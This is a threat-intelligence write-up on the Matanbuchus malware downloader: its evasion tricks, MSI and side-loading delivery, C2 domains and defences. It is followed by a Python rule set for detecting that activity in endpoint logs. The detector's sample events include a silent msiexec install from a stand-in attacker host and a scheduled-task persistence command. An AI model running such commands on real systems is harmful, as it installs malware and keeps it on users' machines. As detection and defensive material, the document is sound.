Researchers report that the Matanbuchus downloader constantly modifies its components to evade machine-learning and antivirus detection. Threat actors now distribute the downloader with Microsoft Installer (MSI) files, and some samples have zero VirusTotal detections. The update highlights the malware's continued development as a Malware-as-a-Service (MaaS) tool tied to ransomware operations.
According to Zscaler, Matanbuchus operators regularly alter code segments, strings, and payloads to evade signature-based antivirus scans. They encrypt strings with ChaCha20, insert junk code, and resolve Windows APIs by MurmurHash values instead of by name. Busy loops that delay execution frustrate sandbox analysis by outlasting short sandbox timeouts. These modifications make static detection unreliable and force defenders to rely on behavior monitoring.
The most recent samples use MSI files hosted on attacker-controlled domains to drop the downloader DLL, which is loaded by side-loading it into a trustworthy executable such as HRUpdate.exe. The sample with SHA-256 hash 6a1398395f5434aa39c5074833698b0a85967eb01d76273ef8762fb149136382 initially evaded every AV engine on VirusTotal. The downloader then retrieves the main module over HTTPS, exchanging Protocol Buffers messages encrypted with ChaCha20.
Technical analysis
Matanbuchus is divided into two heavily obfuscated modules: the downloader and the main module. Before checking in with the C2 server, the downloader collects system information such as hostname, OS version, domain, and installed security tools. It looks for EDR products such as Symantec (ccsvchst.exe), BitDefender (bdagent.exe), and ESET (ekrn.exe). C2 communication is concealed in POST requests carrying base64-encoded, ChaCha20-encrypted JSON or Protobuf messages.
Supported commands include shellcode injection, PowerShell and CMD shells, EXE/DLL/MSI execution, and process hollowing via msiexec.exe. A new C2 example, https://nady[.]io/check/robot.aspx, confirms that the infrastructure is operational.
Component | Key features
Downloader | System reconnaissance, payload fetch, DLL side-loading, C2 polling
Evasion techniques | Junk code, API hashing, busy loops, ChaCha20 encryption, Protobufs
MSI delivery | Zero VT detections, impersonation of legitimate files
Main module | Persistence through scheduled tasks
Impact and Attack Chain
Initial access frequently begins with social engineering: QuickAssist sessions or Teams calls in which attackers pose as IT support. They trick users into opening MSI or ZIP archives that trigger side-loading through the Notepad++ updater. After infection, Matanbuchus deploys RATs such as NetSupport or stealers such as Rhadamanthys, opening the door to ransomware.
Zscaler links these intrusions to manual ransomware preparation, with scheduled tasks such as "Update Tracker Task" providing persistence. Version 3.0 adds WQL queries, indirect syscalls, and enhanced EDR evasion. Since 2020 the campaigns have evolved into targeted operations against enterprises.
Block known C2 domains such as nady[.]io, mechiraz[.]com, and gpa-cro[.]com at firewalls. Enable behavior detection for ChaCha20-encrypted traffic, unusual use of msiexec.exe, and DLL side-loading. Patch QuickAssist and train users to recognize phony IT-support calls. Because module-level changes defeat static signatures, pair EDR with ML-based anomaly detection.
Zscaler detects it as Win32.Backdoor.Matanbuchus; watch for API hashing and newly created scheduled tasks. Search logs for the IOCs, including the VirusTotal hash above and the MSI droppers.
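The detection guidance above (unusual msiexec.exe use, DLL side-loading, scheduled-task persistence, and the named C2 domains) can be expressed as simple rules over endpoint telemetry. The following Python is an added example, not part of the article or of any Zscaler tooling: it runs five rules over a handful of constructed Sysmon-style events (process creation, image load, DNS query) and returns the matches. The event layout and field names are assumptions chosen to resemble Sysmon output, the attacker domain, user name and paths are constructed, and only the C2 domains and the task name come from the article.

```python
import re

# Domains and the task name given in the article (defanging brackets removed for matching).
C2_DOMAINS = {"nady.io", "mechiraz.com", "gpa-cro.com"}
PERSISTENCE_TASK = "update tracker task"
# Directories an ordinary user can write to; a DLL loaded from here is worth a look.
USER_WRITABLE = re.compile(r"^c:\\(users\\|programdata\\|windows\\temp\\)", re.IGNORECASE)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_msiexec_remote(ev):
    # msiexec.exe installing a package straight from a URL (MSI hosted on an attacker domain).
    return (ev["EventID"] == 1 and _basename(ev["Image"]) == "msiexec.exe"
            and re.search(r"https?://", ev.get("CommandLine", ""), re.IGNORECASE) is not None)


def rule_msiexec_spawns_shell(ev):
    # PowerShell/CMD started under msiexec.exe: the article lists shell commands and
    # process hollowing via msiexec.exe among the downloader's capabilities.
    return (ev["EventID"] == 1 and _basename(ev.get("ParentImage", "")) == "msiexec.exe"
            and _basename(ev["Image"]) in SHELLS)


def rule_sideload(ev):
    # An unsigned DLL loaded from a user-writable directory by an executable that sits in
    # the same directory is the classic side-loading shape (trusted EXE + dropped DLL).
    if ev["EventID"] != 7:
        return False
    dll = ev["ImageLoaded"]
    same_dir = dll.rsplit("\\", 1)[0].lower() == ev["Image"].rsplit("\\", 1)[0].lower()
    return bool(USER_WRITABLE.match(dll)) and same_dir and ev.get("Signed", "false") == "false"


def rule_scheduled_task(ev):
    # schtasks /create carrying the task name the article associates with persistence.
    cmd = ev.get("CommandLine", "").lower()
    return (ev["EventID"] == 1 and _basename(ev["Image"]) == "schtasks.exe"
            and "/create" in cmd and PERSISTENCE_TASK in cmd)


def rule_c2_dns(ev):
    # DNS resolution of a known C2 domain or any of its subdomains.
    if ev["EventID"] != 22:
        return False
    q = ev["QueryName"].lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in C2_DOMAINS)


RULES = [
    ("msiexec_remote_package", rule_msiexec_remote),
    ("msiexec_spawns_shell", rule_msiexec_spawns_shell),
    ("dll_sideload_user_dir", rule_sideload),
    ("persistence_task_create", rule_scheduled_task),
    ("known_c2_dns", rule_c2_dns),
]


def evaluate(events):
    """Return (rule name, event index) pairs for every rule that fires."""
    hits = []
    for i, ev in enumerate(events):
        for name, fn in RULES:
            if fn(ev):
                hits.append((name, i))
    return hits


# Constructed events in a Sysmon-like shape; none come from a real incident.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec.exe /i "https://updates.example-attacker.test/HRUpdate.msi" /qn'},
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Local\Temp\HRUpdate.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\helper.dll", "Signed": "false"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\HRUpdate.exe",
     "CommandLine": r'schtasks.exe /create /tn "Update Tracker Task" /sc minute /mo 15 '
                    r'/tr "C:\Users\alice\AppData\Local\Temp\HRUpdate.exe"'},
    {"EventID": 22, "Image": r"C:\Users\alice\AppData\Local\Temp\HRUpdate.exe",
     "QueryName": "nady.io"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "powershell.exe -NoProfile"},
    # Benign: a signed system DLL loaded by a system binary should not fire anything.
    {"EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
]

if __name__ == "__main__":
    for name, idx in evaluate(SAMPLE_EVENTS):
        print(f"{name:26s} event #{idx}")
```

Each of the five malicious events trips exactly one rule and the benign image load trips none. The side-loading rule deliberately requires the DLL and the host executable to share a user-writable directory rather than keying on a filename, because the article notes that the operators change file-level details between samples while the side-loading shape itself persists.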